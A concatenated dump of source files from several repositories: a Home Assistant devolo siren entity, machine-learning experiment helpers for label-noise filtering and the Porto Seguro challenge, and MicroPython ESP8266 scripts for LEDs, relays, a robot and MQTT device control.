class DevoloSirenDeviceEntity(DevoloMultiLevelSwitchDeviceEntity, SirenEntity):
"""Representation of a cover device within devolo Home Control."""
def __init__(
self, homecontrol: HomeControl, device_instance: Zwave, element_uid: str
) -> None:
"""Initialize a devolo multi level switch."""
super().__init__(
homecontrol=homecontrol,
device_instance=device_instance,
element_uid=element_uid,
)
self._attr_available_tones = [
*range(
self._multi_level_switch_property.min,
self._multi_level_switch_property.max + 1,
)
]
self._attr_supported_features = (
SUPPORT_TURN_OFF | SUPPORT_TURN_ON | SUPPORT_TONES
)
self._default_tone = device_instance.settings_property["tone"].tone
@property
def is_on(self) -> bool:
"""Whether the device is on or off."""
return self._value != 0
def turn_on(self, **kwargs: Any) -> None:
"""Turn the device off."""
tone = kwargs.get(ATTR_TONE) or self._default_tone
self._multi_level_switch_property.set(tone)
def turn_off(self, **kwargs: Any) -> None:
"""Turn the device off."""
self._multi_level_switch_property.set(0)
def _generic_message(self, message: tuple) -> None:
"""Handle generic messages."""
if message[0].startswith("mss"):
# The default tone was changed
self._default_tone = message[1]
else:
super()._generic_message(message=message)
``` |
{
"source": "jpedrocm/DSChallenge",
"score": 3
} |
#### File: jpedrocm/DSChallenge/ExperimentationModule.py
```python
import numpy as np
from sklearn.model_selection import cross_val_score
class Experimentation:
"""This class holds a ML model and allows training, predicting and
evaluation with it.
"""
def __init__(self, model, n_folds):
"""Constructor, holds the ML model."""
self.model = model
self.n_folds = n_folds
def _cross_validation_score(self, X, y, scoring):
"""Makes cross_validation and evaluate each fold score."""
scores = cross_val_score(self.model, X, y = y, cv = self.n_folds,
scoring = scoring, verbose=2, n_jobs=1)
return scores
def experiment_model(self, X, y, scoring):
"""Returns the results of the cross-validation."""
folds_scores = self._cross_validation_score(X, y, scoring)
mean_score = np.mean(folds_scores)
std_score = np.std(folds_scores)
return folds_scores, mean_score, std_score
def get_model(self):
"""Returns the ML model."""
return self.model
def predict_labels(self, X):
"""Returns the predicted labels for each row in X."""
return self.model.predict(X)
def predict_probs(self, X):
"""Returns the predicted probabilites for each row in X."""
return self.model.predict_proba(X)
def train_model(self, X, y):
"""Trains model with the list of features X, and the list
of labels y.
"""
self.model.fit(X, y)
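

# Usage sketch (illustrative; the estimator and scoring choices are hypothetical):
#   exp = Experimentation(RandomForestClassifier(), n_folds=5)
#   folds, mean_score, std_score = exp.experiment_model(X, y, scoring="roc_auc")
#   exp.train_model(X, y); labels = exp.predict_labels(X_test)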
```
#### File: jpedrocm/DSChallenge/HandlerModule.py
```python
import pandas as pd
class Handler:
"""This class handles missing data in the dataframe and removes
unninformative columns from it.
"""
@classmethod
def _identify_imputation_method(cls, method):
"""Returns the appropriate imputation function."""
if method=='mean':
return cls._impute_mean_value
elif method=='mode':
return cls._impute_mode_value
elif method=='median':
return cls._impute_median_value
else:
return cls._impute_previous_value
@staticmethod
def _impute_mean_value(column):
"""Fill missing data with the mean of the column."""
mean_val = column.mean()
column.fillna(value=mean_val, inplace=True)
@staticmethod
def _impute_median_value(column):
"""Fill missing data with the median of the column."""
median_val = column.median()
column.fillna(value=median_val, inplace=True)
@staticmethod
def _impute_mode_value(column):
"""Fill missing data with the mode of the column."""
mode_val = column.mode()[0]
column.fillna(value=mode_val, inplace=True)
@staticmethod
def _impute_previous_value(column):
"""Fill missing data with previous values present in the column."""
column.fillna(method='pad', inplace=True)
@classmethod
def impute_missing_values(cls, dataframe, headers, method = None):
"""Impute data for the missing values in the specified columns with
the given method.
"""
_impute_function = cls._identify_imputation_method(method)
for header in headers:
column = dataframe[header]
_impute_function(column)
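
    # Usage sketch (illustrative; the frame and column names are hypothetical):
    #   Handler.impute_missing_values(df, ["age", "income"], method="median")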
@staticmethod
def remove_columns(dataframe, headers):
"""Removes unwanted columns in place based on the given list of
headers.
"""
dataframe.drop(headers, inplace=True, axis=1)
@staticmethod
def remove_rows(dataframe, headers, how):
"""Removes rows which has invalid values for all/any columns from the
given header list.
"""
dataframe.dropna(how=how, subset=headers, inplace=True)
``` |
{
"source": "jpedrocm/jpcm-lista1-codigo",
"score": 3
} |
#### File: jpcm-lista1-codigo/code/prefit_voting_classifier.py
```python
import numpy as np
from sklearn.utils.validation import check_is_fitted
class PrefitVotingClassifier(object):
"""Stripped-down version of VotingClassifier that uses prefit estimators"""
def __init__(self, estimators, feats_per_estimator, voting='hard', weights=None):
self.estimators = [e[1] for e in estimators]
self.feats_per_estimator = feats_per_estimator
self.named_estimators = dict(estimators)
self.voting = voting
self.weights = weights
def fit(self, X, y, sample_weight=None):
raise NotImplementedError
def predict(self, X):
""" Predict class labels for X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
----------
maj : array-like, shape = [n_samples]
Predicted class labels.
"""
check_is_fitted(self, 'estimators')
if self.voting == 'soft':
maj = np.argmax(self.predict_proba(X), axis=1)
else: # 'hard' voting
predictions = self._predict(X)
maj = np.apply_along_axis(lambda x:
np.argmax(np.bincount(x,
weights=self.weights)),
axis=1,
arr=predictions.astype('int'))
return maj
def _collect_probas(self, X):
"""Collect results from clf.predict calls. """
return np.asarray([clf.predict_proba(X) for clf in self.estimators])
def _predict_proba(self, X):
"""Predict class probabilities for X in 'soft' voting """
if self.voting == 'hard':
raise AttributeError("predict_proba is not available when"
" voting=%r" % self.voting)
check_is_fitted(self, 'estimators')
avg = np.average(self._collect_probas(X), axis=0, weights=self.weights)
return avg
@property
def predict_proba(self):
"""Compute probabilities of possible outcomes for samples in X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
----------
avg : array-like, shape = [n_samples, n_classes]
Weighted average probability for each class per sample.
"""
return self._predict_proba
def transform(self, X):
"""Return class labels or probabilities for X for each estimator.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
If `voting='soft'`:
array-like = [n_classifiers, n_samples, n_classes]
Class probabilities calculated by each classifier.
If `voting='hard'`:
array-like = [n_samples, n_classifiers]
Class labels predicted by each classifier.
"""
check_is_fitted(self, 'estimators')
if self.voting == 'soft':
return self._collect_probas(X)
else:
return self._predict(X)
def _predict(self, X):
"""Collect results from clf.predict calls. """
return np.asarray([self.estimators[i].predict(self._select_features(X, i)) for i in xrange(len(self.estimators))]).T
def _select_features(self, X, estimator_index):
X_selected = X[:, self.feats_per_estimator[estimator_index]]
return X_selected
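

# Minimal usage sketch (illustrative; estimators and feature-index lists are hypothetical,
# and each clf_i must already be fit on X_train[:, feats_i]):
#   voter = PrefitVotingClassifier([("a", clf_a), ("b", clf_b)],
#                                  feats_per_estimator=[feats_a, feats_b], voting="hard")
#   y_pred = voter.predict(X_test)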
``` |
{
"source": "jpedrocm/noise-detection-ensemble",
"score": 2
} |
#### File: noise-detection-ensemble/src/config_helper.py
```python
from numpy import nan
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.ensemble import AdaBoostClassifier as Adaboost
from sklearn.tree import DecisionTreeClassifier as Tree
from data_helper import DataHelper
from metrics_helper import MetricsHelper
from noise_detection_ensemble import NoiseDetectionEnsemble
from majority_filtering import MajorityFiltering
class ConfigHelper():
nb_executions = 50
noise_levels = [0.0, 0.1, 0.2, 0.3, 0.4]
@staticmethod
def get_datasets():
space = " "
comma = ","
return ["blood",
"breast",
"chess",
"heart",
"ionosphere",
"liver",
"parkinsons",
"sonar",
"spambase",
]
@staticmethod
def get_classifiers():
return [
("FL_RF", Tree(max_depth=None, min_samples_leaf=1,
splitter="random"), "fl"),
("CL_RF", Tree(max_depth=None, min_samples_leaf=1, splitter="random"), "cl"),
("FL_MAJ_RF", MajorityFiltering.get_ensemble(), "maj"),
("RF", RF(n_estimators=501, max_depth=None,
max_features="sqrt", min_samples_leaf=1,
n_jobs=-1), None),
("Boosting", Adaboost(base_estimator=Tree(max_depth=None,
min_samples_leaf=1,
min_samples_split=2,
min_impurity_decrease=0.01),
n_estimators=501, algorithm="SAMME"),
None)
]
@staticmethod
def choose_algorithm(clf, clean_type, train_X, noisy_train_y,
noisy_idxs, max_nb_feats):
chosen_rate = nan
chosen_threshold = nan
chosen_X = None
chosen_y = None
chosen_clf = None
true_filtered = 0
if clean_type == None:
chosen_X = train_X
chosen_y = noisy_train_y
chosen_clf = clf
elif clean_type == "maj":
filt_X, filt_y = MajorityFiltering.run(train_X,
noisy_train_y)
chosen_X = filt_X
chosen_y = filt_y
chosen_clf = MajorityFiltering.get_ensemble()
true_filtered = MetricsHelper.calculate_true_filter(chosen_y.index,
noisy_idxs)
else:
algorithm_data = NoiseDetectionEnsemble.run(clf, clean_type,
train_X,
noisy_train_y,
max_nb_feats)
chosen_rate = algorithm_data[0]
chosen_threshold = algorithm_data[1]
chosen_X = algorithm_data[2]
chosen_y = algorithm_data[3]
chosen_X, chosen_y, adapted_rate = DataHelper.adapt_rate(chosen_X,
chosen_y, chosen_rate)
chosen_clf = RF(n_estimators=501, max_features="sqrt", n_jobs=-1)
true_filtered = MetricsHelper.calculate_true_filter(chosen_y.index,
noisy_idxs)
tot_filtered = len(train_X)-len(chosen_X.index.unique())
false_filtered = tot_filtered-true_filtered
return [chosen_rate, chosen_threshold, chosen_X, chosen_y, chosen_clf,
true_filtered/len(train_X), false_filtered/len(train_X)]
```
#### File: noise-detection-ensemble/src/data_helper.py
```python
from copy import deepcopy
from numpy import sqrt
from pandas import Series
from sklearn.model_selection import StratifiedKFold
from sklearn.preprocessing import LabelEncoder
class DataHelper():
label_mapping = None
@staticmethod
def extract_feature_labels(frame, target, range_cols=True):
labels = frame[target] if target!=-1 else frame.iloc[:, target]
feats = frame.drop(columns=labels.name)
le = LabelEncoder()
encoded_labels = Series(le.fit_transform(labels), index=labels.index)
if range_cols:
feats.columns=range(len(feats.columns))
return feats, encoded_labels
@staticmethod
def split_in_sets(frame, labels):
skf = StratifiedKFold(n_splits=3, shuffle=True)
splits = skf.split(X=range(len(labels)), y=labels)
return list(splits)[0]
@staticmethod
def select_rows(frame, idxs, copy):
sel = frame.iloc[idxs]
sel = deepcopy(sel) if copy == True else sel
return sel
@staticmethod
def create_label_mapping(labels):
unique_values = labels.unique().tolist()
DataHelper.label_mapping = {unique_values[0]: unique_values[1],
unique_values[1]: unique_values[0]}
@staticmethod
def map_labels(labels, sample_idxs, sample_values):
noise_values = [DataHelper.label_mapping[v] for v in sample_values]
noisy_labels = deepcopy(labels)
noisy_labels.loc[sample_idxs] = noise_values
return noisy_labels
@staticmethod
def insert_noise(labels, level):
sample = labels.sample(frac=level)
sample_idxs = sample.index
sample_values = sample.values
return sample_idxs, DataHelper.map_labels(labels,
sample_idxs, sample_values)
@staticmethod
def calculate_max_nb_features(features):
nb_features = len(features.columns)
return max(1, int(sqrt(nb_features)))
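    # e.g. a 30-feature dataset gives max(1, int(sqrt(30))) = 5 features.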
@staticmethod
def adapt_rate(X, y, rate):
adapted = None
if rate > 1:
raise ValueError("Rate can't be bigger than 1.0")
else:
adapted = [deepcopy(X), deepcopy(y), rate]
return adapted
```
#### File: noise-detection-ensemble/src/majority_filtering.py
```python
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.model_selection import StratifiedKFold
from pandas import DataFrame, Series
from data_helper import DataHelper
class MajorityFiltering():
k_folds = 3
@staticmethod
def get_ensemble():
return RF(n_estimators=501, max_depth=None, max_features="sqrt",
min_samples_leaf=1, n_jobs=-1)
@staticmethod
def _clean_data(X, y):
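        """Keep only the rows whose label agrees with the out-of-fold prediction
        of a random-forest ensemble (classical majority/consensus noise filtering)."""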
clean_X = DataFrame(columns=X.columns)
clean_y = Series(name=y.name)
skf = StratifiedKFold(n_splits=MajorityFiltering.k_folds,
shuffle=True)
for train_idxs, val_idxs in skf.split(X=range(len(y)), y=y):
train_X = DataHelper.select_rows(X, train_idxs, copy=False)
train_y = DataHelper.select_rows(y, train_idxs, copy=False)
ensemble = MajorityFiltering.get_ensemble()
ensemble.fit(train_X, train_y)
val_X = DataHelper.select_rows(X, val_idxs, copy=False)
predictions = ensemble.predict(val_X)
maintain_idxs = [val_idxs[i] for i in range(len(val_idxs)) \
if predictions[i]==y.iloc[val_idxs[i]]]
maintain_X = DataHelper.select_rows(X, maintain_idxs,
copy=True)
maintain_y = DataHelper.select_rows(y, maintain_idxs,
copy=True)
clean_X = clean_X.append(maintain_X, verify_integrity=True,
sort=False)
clean_y = clean_y.append(maintain_y, verify_integrity=True)
return clean_X, clean_y
@staticmethod
def run(train_X, train_y):
return MajorityFiltering._clean_data(train_X, train_y)
```
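A hedged sketch of how the filter above could be exercised on synthetic data; `make_classification`, the sizes, and the 30% noise level are illustrative choices, and the snippet assumes a pandas version that still provides `DataFrame.append` (as the filter itself does):
```python
from pandas import DataFrame, Series
from sklearn.datasets import make_classification

from data_helper import DataHelper
from majority_filtering import MajorityFiltering

# Toy two-class problem (illustrative sizes only).
X, y = make_classification(n_samples=300, n_features=10, random_state=0)
X, y = DataFrame(X), Series(y)

# Corrupt 30% of the labels, then let the ensemble vote suspicious rows out.
DataHelper.create_label_mapping(y)
noisy_idxs, noisy_y = DataHelper.insert_noise(y, level=0.3)
clean_X, clean_y = MajorityFiltering.run(X, noisy_y)

print(len(X), "rows before filtering,", len(clean_X), "after")
```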
#### File: noise-detection-ensemble/src/metrics_helper.py
```python
from sklearn.metrics import accuracy_score
from pandas import DataFrame
import matplotlib.pyplot as plt
class MetricsHelper():
metrics = []
@staticmethod
def calculate_error_score(true_y, pred_y):
return (1-accuracy_score(true_y, pred_y))
@staticmethod
def calculate_true_filter(y_idxs, noisy_idxs):
set_idxs = set(list(y_idxs))
true_filtered = [i for i in list(noisy_idxs) if i not in set_idxs]
return len(set(true_filtered))
@staticmethod
def reset_metrics():
MetricsHelper.metrics = []
@staticmethod
def convert_metrics_to_frame():
columns = ["dataset", "execution", "noise", "clf", "sampling_rate",
"threshold", "test_error", "true_filtered", "false_filtered"]
return DataFrame(MetricsHelper.metrics, columns=columns)
@staticmethod
def adapt_results(results):
results.drop(columns="execution", inplace=True)
results[["noise", "test_error", "false_filtered", "true_filtered"]] *= 100
results[["noise"]] = results[["noise"]].astype(int)
@staticmethod
def _finish_param_plot(frame, y_name, ylim, x_label, y_label):
frame = frame[frame["clf"]=="FL_RF"]
frame = frame.groupby(by=["dataset", "noise"]).mean().unstack()
p=frame.plot(kind="bar", y=y_name, ylim=ylim)
p.set_xlabel(x_label)
p.set_ylabel(y_label)
p.xaxis.set_label_coords(0.5, -0.1)
p.yaxis.set_label_coords(-0.05, 0.5)
p.legend(loc="center", ncol=5, title="noise", fontsize="medium",
labels=["0%", "10%", "20%", "30%", "40%"],
frameon=False, bbox_to_anchor=(0.5, 1.05))
plt.show()
@staticmethod
def aggregate_rate(results):
frame = results.drop(columns=["false_filtered", "true_filtered",
"threshold", "test_error"])
MetricsHelper._finish_param_plot(frame, "sampling_rate", (0.0, 1.2),
"Fig. 1 - Best Sampling Rates",
"sampling rate")
@staticmethod
def aggregate_threshold(results):
frame = results.drop(columns=["false_filtered", "true_filtered",
"sampling_rate", "test_error"])
MetricsHelper._finish_param_plot(frame, "threshold",
(0.5, 1.0),
"Fig. 2 - Best Thresholds",
"threshold")
@staticmethod
def aggregate_error(results):
frame = results.drop(columns=["false_filtered", "true_filtered",
"sampling_rate", "threshold"])
frame = frame.replace({"FL_RF": "1_FL_RF", "CL_RF": "2_CL_RF",
"FL_MAJ_RF": "3_FL_MAJ"})
mean_group = frame.groupby(by=["dataset", "noise", "clf"])
mean_frame = mean_group.mean().round(1).unstack().astype(str)
std_frame = mean_group.std().round(1).unstack().astype(str)
final_frame = mean_frame + " ± " + std_frame
return final_frame
@staticmethod
def aggregate_filter(results):
frame = results.drop(columns=["test_error", "sampling_rate", "threshold"])
for noise in [0, 10, 30]:
noise_frame= frame[frame["noise"]==noise]
noise_frame = noise_frame.drop(columns="noise")
for clf in ["FL_RF", "FL_MAJ_RF"]:
clf_frame= noise_frame[noise_frame["clf"]==clf]
clf_frame = clf_frame.drop(columns="clf")
clf_frame = clf_frame.groupby(by=["dataset"]).mean()
p=clf_frame.plot(kind="bar", stacked=True, title=str(noise)+ "% noise",
ylim=(0,60))
p.set_xlabel(clf)
p.set_ylabel("percentage")
p.xaxis.set_label_coords(0.5, -0.1)
p.yaxis.set_label_coords(-0.05, 0.5)
p.legend(loc="upper right", ncol=1, labelspacing=-2,
title="", fontsize="medium",frameon=False,
bbox_to_anchor=(0.98, 0.95),
labels=["correctly filtered", "all filtered"])
plt.show()
``` |
{
"source": "jpedrocm/porto-seguro-experiment",
"score": 3
} |
#### File: porto-seguro-experiment/code/config_helper.py
```python
from sklearn.model_selection import StratifiedKFold
from sklearn.svm import SVC as SVM
from sklearn.neural_network import MLPClassifier as MLP
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.ensemble import GradientBoostingClassifier as GB
class ConfigHelper():
# Do not change
k_folds = 2
nb_executions = 5
max_nb_features = 50
use_predefined_cols = False
analysis_dataset = "train"
###########################
metrics_file = "cv_metrics" #Change this when trying new experiments
@staticmethod
def k_fold_cv(labels):
skf = StratifiedKFold(n_splits=ConfigHelper.k_folds, shuffle=True)
return skf.split(X=range(len(labels)), y=labels)
@staticmethod
def get_submission_models():
return [("GB_Final", GB(n_estimators=250, learning_rate=0.1, subsample=1.0,
max_depth=3, min_samples_split=20)),
]
@staticmethod
def get_training_models():
return [
("MLP_RELU", MLP(hidden_layer_sizes=(100, ), alpha=0.0001,
activation="relu", learning_rate_init=0.001,
tol=0.0001, max_iter=200)),
("GB_50", GB(n_estimators=250, learning_rate=0.1, subsample=1.0,
max_depth=3, min_samples_split=20)),
("RF_FINAL", RF(n_estimators=250, max_depth=None, min_samples_split=2,
bootstrap=True, n_jobs=-1)),
]
```
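A small sketch of how the cross-validation helper above might be consumed; the toy label array is an assumption for illustration, and the import assumes the module is on the path as `config_helper`:
```python
import numpy as np

from config_helper import ConfigHelper

# Toy binary labels (illustrative only).
labels = np.array([0, 1] * 10)

# k_fold_cv yields one (train_indices, test_indices) pair per fold.
for fold, (train_idx, test_idx) in enumerate(ConfigHelper.k_fold_cv(labels)):
    print("fold", fold, "train size", len(train_idx), "test size", len(test_idx))
```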
#### File: porto-seguro-experiment/code/metrics_helper.py
```python
import numpy as np
from pandas import DataFrame
class MetricsHelper():
probs = {}
gold = []
metrics = DataFrame(columns=["model", "gini"])
@staticmethod
def _gini(gold, pred, cmpcol=0, sortcol=1):
assert(len(gold) == len(pred))
all_preds = np.asarray(np.c_[gold, pred, np.arange(len(gold))],
dtype=np.float)
all_preds = all_preds[np.lexsort((all_preds[:,2], -1*all_preds[:,1]))]
total_losses = all_preds[:,0].sum()
gini_sum = all_preds[:,0].cumsum().sum() / total_losses
gini_sum -= (len(gold)+1) / float(2)
return gini_sum/len(gold)
@staticmethod
def _calculate_metrics(model, gold, prob):
pos_prob = [row[1] for row in prob]
pred = np.argmax(prob, axis=1)
gini_score = MetricsHelper._gini(gold, pos_prob)/ \
MetricsHelper._gini(gold, gold)
return [model, gini_score]
@staticmethod
def reset_metrics():
MetricsHelper.probs = {}
MetricsHelper.gold = []
@staticmethod
def store_gold(gold):
MetricsHelper.gold.extend(gold)
@staticmethod
def store_probs(prob, model):
prob = prob.tolist()
if model not in MetricsHelper.probs:
MetricsHelper.probs[model] = prob
else:
MetricsHelper.probs[model].extend(prob)
@staticmethod
def calculate_metrics():
print "Calculating metrics"
for model, probs in MetricsHelper.probs.iteritems():
idx = len(MetricsHelper.metrics)
m = MetricsHelper._calculate_metrics(model, MetricsHelper.gold,
probs)
MetricsHelper.metrics.loc[idx] = m
@staticmethod
def summarize_metrics():
print "Getting summary of metrics"
grouped = MetricsHelper.metrics.groupby(by=["model"], as_index=True)
MetricsHelper.metrics = grouped.agg([np.mean, np.std, np.amin,
np.amax])
print MetricsHelper.metrics
@staticmethod
def get_submission(idxs, prob):
pos_prob = [row[1] for row in prob]
submission = DataFrame(columns=["target"], index=idxs)
submission["target"] = pos_prob
return submission
``` |
{
"source": "jpedrodias/MicroPython",
"score": 3
} |
#### File: jpedrodias/MicroPython/board_manager.py
```python
from micropython import const
import machine
import time
import ntptime  # required by NTPClock.update()
# WEMOS D1 Mini Board GPIO Map: D8 pull_down, D4 pull_down
# D0=16, D1=5, D2=4, D3=0, D4=2, D5=14, D6=12, D7=13, D8=15
D0 = const(16)
D1 = const(5)
D2 = const(4)
D3 = const(0)
D4 = const(2)
D5 = const(14)
D6 = const(12)
D7 = const(13)
D8 = const(15)
class rgb_colors():
brightness = 50  # percent of full scale, keeps channel values within the 0-255 range
RED = (255*brightness//100, 0, 0)
GREEN = (0, 255*brightness//100, 0)
BLUE = (0, 0, 255*brightness//100)
BLACK = (0, 0, 0)
#End RGB_Colors
class NTPClock():
@property
def time(self):
return time.time()
@property
def str_time(self):
l = self.local
g = self.gmt
z = self.zone
d = '{:04d}-{:02d}-{:02d}'.format(*l[0:3])
t = '{:02d}:{:02d}:{:02d}'.format(*l[3:6])
return '{}T{}Z{}'.format(d, t, z)
@property
def local(self):
return time.localtime()
@property
def gmt(self):
return time.gmtime()
@property
def zone(self):
return self.local[4]-self.gmt[4]
@property
def timestamp(self):
return self.str_time
@staticmethod
def update():
try:
ntptime.settime()
except:
return False
return True
def __repr__(self):
return self.str_time
class StatusLED():
def __init__(self, pin=2):
self.led = machine.Pin(pin, machine.Pin.OUT)
def value(self, value):
self.led.value(value)
def on(self):
self.value(1)
def off(self):
self.value(0)
def toggle(self):
self.led.value(not self.led.value())
#end StatusLED
```
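A minimal MicroPython sketch using the helpers above; the pin choice (the on-board LED on D4/GPIO2 of a Wemos D1 mini) and the blink count are assumptions for illustration:
```python
import time

from board_manager import D4, StatusLED, NTPClock

led = StatusLED(D4)   # on-board LED of the Wemos D1 mini (active-low on many boards)
clock = NTPClock()

# Blink five times, printing the current timestamp each cycle.
for _ in range(5):
    led.toggle()
    print(clock.timestamp)
    time.sleep(0.5)
led.off()
```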
#### File: MicroPython/examples/GreenHouse_ESP8266_and_ArduinoRelays.py
```python
import micropython, machine, gc, time, json
from board_manager import D1, D2
DEBUG = micropython.const(0) # Exit Infinit Loop if DEBUG is True
app_name = 'RelayBoard v4'
print( app_name )
# Connection to Slave Arduino
i2c = machine.I2C(scl=machine.Pin(D1), sda=machine.Pin(D2))
i2c_slave = micropython.const(8) #i2c.scan()[0]
i2c_cmds = [b'O*', b'C*', b'L*', b'O1', b'C1', b'L1', b'O2', b'C2', b'L2']
def mqtt_callback(topic, msg):
global chatty_client, main_delay
if DEBUG: print(topic, msg)
if msg == b'S':
check_status(True)
elif msg == b'chatty on':
chatty_client = True
elif msg == b'chatty off':
chatty_client = False
elif msg.startswith(b'delay'):
try:
main_delay = int(msg.split()[1])
except:
pass
elif msg in i2c_cmds:
i2c.writeto(i2c_slave, msg)
def check_status(publish=False):
status = i2c.readfrom(i2c_slave, 6)
status_str = ''
for c in status:
status_str += str(c)
if DEBUG: print(status_str)
data = {
'chatty': chatty_client,
'delay' : main_delay,
'status': status_str
}
if publish:
try:
mqtt_client.send(TOPIC_PUB, json.dumps(data))
except:
print('MQTT send failed!')
print('MQTT', data)
def reconnect():
wlan_client.start()
print("MQTT check...")
success = wlan_client.check() and mqtt_client.check()
if success:
mqtt_client.broker.subscribe(TOPIC_SUB)
return success
gc.collect()
from wlan_manager import WLAN_Manager
wlan_client = WLAN_Manager()
from mqtt_manager import MQTT_Manager
mqtt_client = MQTT_Manager()
TOPIC_SUB = mqtt_client.get_topic('control')
TOPIC_PUB = mqtt_client.get_topic('status')
chatty_client = bool(mqtt_client.CONFIG.get('chatty', True))
mqtt_client.broker.set_callback(mqtt_callback)
print( 'client_id:', mqtt_client.CONFIG['client_id'] )
connected = reconnect()
if DEBUG and connected:
mqtt_client.send('debug', TOPIC_SUB)
mqtt_client.send('debug', TOPIC_PUB)
mqtt_client.send('debug', app_name)
gc.collect()
time.sleep(1)
if __name__ == "__main__":
main_delay = mqtt_client.CONFIG['delay']
if DEBUG: main_delay = 5
Loops = 60
gc.collect()
while Loops:
t_start = time.ticks_ms()
if DEBUG: Loops -= 1
gc.collect()
if chatty_client:
check_status(chatty_client and connected)
while time.ticks_diff(time.ticks_ms(), t_start) <= main_delay * 1000:
connected = mqtt_client.check_msg()
if not connected:
connected = reconnect()
if not connected:
time.sleep(5)
time.sleep(0.5)
#end loop
mqtt_client.close()
print(app_name)
print( "Rebooting" )
time.sleep(5)
machine.reset()
#end if __main__
```
#### File: MicroPython/examples/MQTT_example_03_LED_control.py
```python
from time import sleep, sleep_ms
from machine import Pin
from board_manager import *
from wlan_manager import WLAN_Manager
from mqtt_manager import MQTT_Manager
from json import dumps, loads
wlan_client = WLAN_Manager()
mqtt_client = MQTT_Manager()
def reconnect():
print("WiFi Connection")
wlan_client.start()
for i in range(30):
if wlan_client.check(): break
print(".", end="")
sleep(1)
sleep(5)
success = wlan_client.check() and mqtt_client.check()
if success:
mqtt_client.broker.subscribe(TOPIC_SUB)
return success
def mqtt_callback(topic, msg):
global status
print('Message received! Topic: {};\nData: {}'.format(topic.decode(), msg.decode()))
# Get the number 0 to 8 after /control/#
try:
object = int(topic.decode().split("/")[-1])
except:
print("Erro ao tentar ter objeto.")
return False
try:
value = int(msg.decode())
except:
print("Erro ao tentar ter valor.")
return False
if object not in [i for i in range(len(objects))] or value not in [0, 1]:
print("Error in Object={} or value={}".format(object, value))
return False
status[ object ] = value
return True
PREFIX = "Presonal"
TOPIC_SUB = "/".join( [PREFIX, mqtt_client.get_topic("control"), "#"] ) #Canal onde recebe e interpreta as mensagens
TOPIC_PUB = "/".join( [PREFIX, mqtt_client.get_topic("status") ] ) #Canal onde manda as mensagens
chatty_client = bool(mqtt_client.CONFIG.get("chatty", True))
mqtt_client.broker.set_callback(mqtt_callback)
print( "client_id:", mqtt_client.CONFIG["client_id"] ) #Para saber o client_id
connected = reconnect()
if connected:
mqtt_client.send("debug message", TOPIC_SUB)
mqtt_client.send("debug message", TOPIC_PUB)
# LED connections
G = Pin(D7, Pin.OUT, value=0)
Y = Pin(D6, Pin.OUT, value=0)
R = Pin(D5, Pin.OUT, value=0)
objects = [G, Y, R]
status = [object.value() for object in objects]
last_status = [0 for i in range(len(objects))]
while True:
success = mqtt_client.check_msg()
if not success:
success = mqtt_client.check()
if not success:
success = reconnect()
for i in range(len(objects)):
if status[i] != last_status[i]:
print("Data Changed")
objects[i].value( status[i] )
topic = "{}/{}".format( TOPIC_PUB, i )
data = dumps( status[i] )
mqtt_client.send( topic, data ) # reports back status
last_status[i] = status[i]
sleep(1)
```
#### File: MicroPython/examples/ROBOT_example_01.py
```python
import os, gc, micropython, machine, random, time
class Motor():
def __init__(self, EN1, EN2):
if isinstance(EN1, int) and isinstance(EN2, int):
self.EN1 = machine.Pin(EN1, mode=machine.Pin.OUT, value=0, pull=None)
self.EN2 = machine.Pin(EN2, mode=machine.Pin.OUT, value=0, pull=None)
else:
raise TypeError('EN1 and EN2 must be integer')
def forward(self):
self.EN1.value(1)
self.EN2.value(0)
def backward(self):
self.EN1.value(0)
self.EN2.value(1)
def stop(self):
self.EN1.value(0)
self.EN2.value(0)
#End Motor
class Robot():
def __init__(self, M1, M2):
if isinstance(M1, Motor) and isinstance(M2, Motor):
self.M1 = M1 # Motor 1
self.M2 = M2 # Motor 2
else:
raise TypeError('M1 and M2 must be a Motor object')
def stop(self):
self.M1.stop()
self.M2.stop()
def forward(self):
self.M1.forward()
self.M2.forward()
def backward(self):
self.M1.backward()
self.M2.backward()
def turn(self, mode=0):
if mode == 1:
self.M1.forward()
elif mode == 2:
self.M2.forward()
else:
self.M1.forward()
self.M2.backward()
#End class Robot
motor1 = Motor(13, 15) # D7 = 13, D8 = 15
motor2 = Motor(14, 12) # D5 = 14, D6 = 12
robot = Robot(motor1, motor2)
from sensor_manager import Sensor_HCSR04
dsensor = Sensor_HCSR04(trigger=5, echo=4) # D1=5, D2=4
green = machine.Pin(0, machine.Pin.OUT, value=0) #D3
yellow = machine.Pin(2, machine.Pin.OUT, value=0) #D4
red = machine.Pin(16, machine.Pin.OUT, value=0) #D0
gc.collect()
DELAY = 1 * 1000
t_start = time.ticks_ms()
while True:
dsensor.read()
distance = dsensor.distance_cm
if distance < 5:
robot.stop()
green.value(0)
yellow.value(0)
red.value(1)
time.sleep_ms(250)
robot.backward()
time.sleep_ms(250)
robot.stop()
elif distance < 10:
robot.stop()
green.value(0)
yellow.value(1)
red.value(0)
time.sleep_ms(250)
robot.turn( random.getrandbits(2) )
time.sleep_ms(250)
robot.stop()
else:
robot.forward()
green.value(1)
yellow.value(0)
red.value(0)
t_diff = time.ticks_diff(time.ticks_ms(), t_start)
if t_diff > DELAY:
print(dsensor.distance_cm)
t_start = time.ticks_ms()
time.sleep_ms(50)
```
#### File: MicroPython/examples/uPhotoGate_MQTT_OLED.py
```python
import os, gc, micropython, machine, time, json
# Broker
# https://www.hivemq.com/public-mqtt-broker/
# TOPIC: devices/???/status
GATE_PIN = micropython.const(13) # D7
GATE_MODE = micropython.const(0) # 0 for always on | 1 for always off
DEBUG = micropython.const(1) # Change from 1 debug mode to 0 production mode
DEBUG_TIME = micropython.const(10) # Run in debug mode for this amount of seconds
DELAY_TIME = micropython.const(1) # Delay between loops
print('PhotoGate in MicroPython')
from wlan_manager import WLAN_Manager # Wireless Connection
wlan_client = WLAN_Manager()
wlan_client.start()
from mqtt_manager import MQTT_Manager # MQTT Connection
mqtt_client = MQTT_Manager()
mqtt_client.check() # Open connection to broker
TOPIC_SUB = mqtt_client.get_topic('control')
TOPIC_PUB = mqtt_client.get_topic('status')
print('Topic:', TOPIC_PUB)
# ssd1306 version
import ssd1306
